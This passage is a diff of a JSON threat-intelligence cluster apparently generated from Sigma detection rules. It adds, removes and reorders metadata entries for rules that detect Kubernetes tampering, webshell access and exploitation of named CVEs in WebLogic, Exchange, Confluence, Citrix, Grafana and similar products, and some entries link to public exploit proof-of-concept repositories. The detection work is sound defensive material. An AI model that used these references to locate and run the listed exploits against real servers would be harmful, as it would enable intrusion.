"https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml",
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml"
],
"tags": [
@@ -83890,10 +80487,10 @@
"logsource.category": "No established category",
"logsource.product": "azure",
"refs": [
- "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
"https://kubernetes.io/docs/concepts/workloads/controllers/job/",
"https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml"
],
"tags": [
@@ -83996,10 +80593,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml"
],
"tags": [
@@ -84629,10 +81226,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml"
],
"tags": [
@@ -84658,10 +81255,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml"
],
"tags": [
@@ -84681,6 +81278,40 @@
"uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2",
"value": "Azure Kubernetes Service Account Modified or Deleted"
},
+ {
+ "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2021/05/31",
+ "falsepositive": [
+ "Serious issues with a configuration or plugin"
+ ],
+ "filename": "web_nginx_core_dump.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps",
+ "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/nginx/web_nginx_core_dump.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1499.004"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56",
+ "value": "Nginx Core Dump"
+ },
{
"description": "Detects an issue in apache logs that reports threading related errors",
"meta": {
@@ -84735,41 +81366,6 @@
"uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1",
"value": "Apache Segmentation Fault"
},
- {
- "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2020/03/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/wugeej/status/1369476795255320580",
- "https://paper.seebug.org/1495/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_21978_vmware_view_planner_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.21978"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9",
- "value": "CVE-2021-21978 Exploitation Attempt"
- },
{
"description": "Detects common commands used in Windows webshells",
"meta": {
@@ -84784,8 +81380,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://bad-jubies.github.io/RCE-NOW-WHAT/",
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
+ "https://bad-jubies.github.io/RCE-NOW-WHAT/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml"
],
"tags": [
@@ -84805,292 +81401,6 @@
"uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729",
"value": "Windows Webshell Strings"
},
- {
- "description": "Detects exploitation attempts on WebLogic servers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/11/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_14882_weblogic_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/sudo_sudoka/status/1323951871078223874",
- "https://isc.sans.edu/diary/26734",
- "https://twitter.com/jas502n/status/1321416053050667009?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.14882"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b",
- "value": "Oracle WebLogic Exploit CVE-2020-14882"
- },
- {
- "description": "Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection",
- "meta": {
- "author": "Sittikorn S, Nuttakorn T",
- "creation_date": "2022/12/13",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_26084_confluence_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md",
- "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
- "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/",
- "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_26084_confluence_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "38825179-3c78-4fed-b222-2e2166b926b1",
- "value": "Potential CVE-2021-26084 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_sonicwall_jarrewrite_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sonicwall_jarrewrite_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "6f55f047-112b-4101-ad32-43913f52db46",
- "value": "SonicWall SSL/VPN Jarrewrite Exploit"
- },
- {
- "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/03/03",
- "falsepositive": [
- "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related"
- ],
- "filename": "web_exchange_exploitation_hafnium.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_exploitation_hafnium.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2",
- "value": "Exchange Exploitation Used by HAFNIUM"
- },
- {
- "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/12/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_solarwinds_supernova_webshell.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.anquanke.com/post/id/226029",
- "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_solarwinds_supernova_webshell.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db",
- "value": "Solarwinds SUPERNOVA Webshell Access"
- },
- {
- "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/07/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2018_2894_weblogic_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/pyn3rd/status/1020620932967223296",
- "https://github.com/LandGrey/CVE-2018-2894",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "attack.persistence",
- "attack.t1505.003",
- "cve.2018.2894"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000",
- "value": "Oracle WebLogic Exploit"
- },
- {
- "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_8193_8195_citrix_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://support.citrix.com/article/CTX276688",
- "https://dmaasland.github.io/posts/citrix.html",
- "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7",
- "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195"
- },
- {
- "description": "Detects a successful Grafana path traversal exploitation",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/08",
- "falsepositive": [
- "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error"
- ],
- "filename": "web_cve_2021_43798_grafana.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/search?q=CVE-2021-43798",
- "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_43798_grafana.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16",
- "value": "Grafana Path Traversal Exploitation CVE-2021-43798"
- },
{
"description": "Detects exploitation attempt using the JDNIExploiit Kit",
"meta": {
@@ -85104,8 +81414,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://githubmemory.com/repo/FunctFan/JNDIExploit",
"https://github.com/pimps/JNDI-Exploit-Kit",
+ "https://githubmemory.com/repo/FunctFan/JNDIExploit",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml"
],
"tags": "No established tags"
@@ -85113,121 +81423,10 @@
"uuid": "412d55bc-7737-4d25-9542-5b396867ce55",
"value": "JNDIExploit Pattern"
},
- {
- "description": "Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.",
- "meta": {
- "author": "@gott_cyber",
- "creation_date": "2022/12/11",
- "falsepositive": [
- "Vulnerability Scanners"
- ],
- "filename": "web_cve_2021_27905_apache_solr_exploit.yml",
- "level": "medium",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186",
- "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/",
- "https://twitter.com/sec715/status/1373472323538362371",
- "https://github.com/murataydemir/CVE-2021-27905",
- "https://twitter.com/Al1ex4/status/1382981479727128580",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_27905_apache_solr_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.27905"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0bbcd74b-0596-41a4-94a0-4e88a76ffdb3",
- "value": "Potential CVE-2021-27905 Exploitation Attempt"
- },
- {
- "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection",
- "meta": {
- "author": "@gott_cyber",
- "creation_date": "2022/08/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2022_27925_exploit.yml",
- "level": "medium",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
- "https://github.com/vnhacker1337/CVE-2022-27925-PoC",
- "https://www.yang99.top/index.php/archives/82/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_27925_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.27925"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd",
- "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE"
- },
- {
- "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/09/29",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/",
- "https://twitter.com/_0xf4n9x_/status/1572052954538192901",
- "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html",
- "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.36804"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685",
- "value": "Atlassian Bitbucket Command Injection Via Archive API"
- },
{
"description": "Detects SQL Injection attempts via GET requests in access logs",
"meta": {
- "author": "Saw Win Naung, Nasreddine Bencherchali",
+ "author": "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2020/02/22",
"falsepositive": [
"Java scripts and CSS Files",
@@ -85239,10 +81438,10 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://brightsec.com/blog/sql-injection-payloads/",
- "https://github.com/payloadbox/sql-injection-payload-list",
- "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/",
"https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/",
+ "https://brightsec.com/blog/sql-injection-payloads/",
+ "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/",
+ "https://github.com/payloadbox/sql-injection-payload-list",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml"
],
"tags": "No established tags"
@@ -85250,247 +81449,6 @@
"uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453",
"value": "SQL Injection Strings"
},
- {
- "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/12/22",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "web_exchange_owassrf_poc_exploitation.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw",
- "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/",
- "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_owassrf_poc_exploitation.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "92d78c63-5a5c-4c40-9b60-463810ffb082",
- "value": "OWASSRF Exploitation Attempt Using Public POC - Webserver"
- },
- {
- "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_26814_wzuh_rce.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.21978",
- "cve.2021.26814"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3",
- "value": "Exploitation of CVE-2021-26814 in Wazuh"
- },
- {
- "description": "Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2023/02/23",
- "falsepositive": [
- "Vulnerability scanners"
- ],
- "filename": "web_cve_2023_23752_joomla_exploit_attempt.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/momika233/status/1626464189261942786",
- "https://xz.aliyun.com/t/12175",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2023_23752_joomla_exploit_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2023.23752"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0e1ebc5a-15d0-4bf6-8199-b2535397433a",
- "value": "Potential CVE-2023-23752 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/12/22",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_exchange_owassrf_exploitation.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/",
- "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_owassrf_exploitation.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "181f49fa-0b21-4665-a98c-a57025ebb8c7",
- "value": "Potential OWASSRF Exploitation Attempt - Webserver"
- },
- {
- "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/31",
- "falsepositive": [
- "Serious issues with a configuration or plugin"
- ],
- "filename": "web_nginx_core_dump.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "No established product",
- "refs": [
- "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps",
- "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_nginx_core_dump.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1499.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56",
- "value": "Nginx Core Dump"
- },
- {
- "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)",
- "meta": {
- "author": "Sittikorn S",
- "creation_date": "2021/06/29",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html",
- "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_22893_pulse_secure_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5525edac-f599-4bfd-b926-3fa69860e766",
- "value": "Pulse Connect Secure RCE Attack CVE-2021-22893"
- },
- {
- "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n",
- "meta": {
- "author": "Subhash Popuri (@pbssubhash)",
- "creation_date": "2021/08/25",
- "falsepositive": [
- "Scanning from Nuclei",
- "Unknown"
- ],
- "filename": "web_cve_2010_5278_exploitation_attempt.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/projectdiscovery/nuclei-templates",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2010_5278_exploitation_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61",
- "value": "CVE-2010-5278 Exploitation Attempt"
- },
{
"description": "Detects source code enumeration that use GET requests by keyword searches in URL strings",
"meta": {
@@ -85504,8 +81462,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1",
"https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html",
+ "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_source_code_enumeration.yml"
],
"tags": [
@@ -85525,217 +81483,6 @@
"uuid": "953d460b-f810-420a-97a2-cfca4c98e602",
"value": "Source Code Enumeration Detection by Keyword"
},
- {
- "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
